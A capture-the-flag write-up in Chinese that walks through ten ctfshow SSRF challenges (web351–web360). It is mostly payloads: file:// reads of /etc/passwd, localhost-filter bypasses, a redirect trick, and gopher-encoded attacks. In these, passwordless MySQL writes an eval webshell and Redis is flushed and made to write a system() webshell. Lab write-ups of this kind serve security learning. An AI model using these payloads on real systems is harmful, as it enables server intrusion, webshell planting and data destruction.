目录
1、web351
看到 curl_exec 函数,很典型的 SSRF
尝试使用 file 协议读文件:
url=file:///etc/passwd
成功读取到 /etc/passwd
同理我们可以把 flag 给读出来:
url=file:///var/www/html/flag.php
结合这个代码我们可以发现,请求来自本地就可以了
那么我们也可以这样打:
url=http://127.0.0.1/flag.php
2、web352
限制只能使用 http 或者 https 协议,并且禁止本地地址访问
但是???
我们还是绕一下吧,比如十六进制绕过,payload:
url=http://0x7F000001/flag.php
3、web353
这次检测的是 127.0. 开头的
上一题 payload 可用,此外很有很多其他的,比如:
url=http://0/flag.php
url=http://127.1/flag.php
4、web354
这次直接检查 0 和 1
采用一些解析到本地的域名绕过:
payload:
url=http://sudo.cc/flag.php
5、web355
限制 host 长度小于等于 5
这个就很简单了,直接拿前面的 payload 打:
url=http://0/flag.php
6、web356
限制 host 长度小于等于 3
上一题 payload 可用:
url=http://0/flag.php
7、web357
使用 gethostbyname() 将 URL 中的域名解析为对应的 IP 地址
通过 filter_var() 验证得到的 IP 地址是否为有效的公共 IP 地址,并且不是私有或保留地址
使用 file_get_contents() 获取并输出该 URL 对应的内容
利用 Location 进行重定向,写一个重定向的文件 my6n.php 在服务器上:
php
<?php
header("Location:http://127.0.0.1/flag.php"); payload:
php
url=http://ip/my6n.php
8、web358
匹配以 http://ctf. 开头,并且以 show 结尾
采用 @ 截断,payload:
php
url=http://ctf.@127.0.0.1/flag.php?show
9、web359
打无密码的mysql
用 Gopher 协议打无密码的 mysql
这里的 SSRF 是url_exec() 造成的,因此我们 payload 需要再进行一次 url 编码:
在 check.php 给 returl 传参
php
returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2548%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%256d%2579%2536%256e%252e%2570%2568%2570%2522%2501%2500%2500%2500%2501
调用
读取 flag
10、web360
打redis
用 Gopher 协议打 Redis
生成默认木马:shell.php 密码是cmd
但是访问 shell.php 发现结果有乱码
不太行,直接命令执行看结果吧
payload:
php
gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252430%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2527tac%2520/f%252A%2527%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
至此 SSRF 结束
My6n,20241116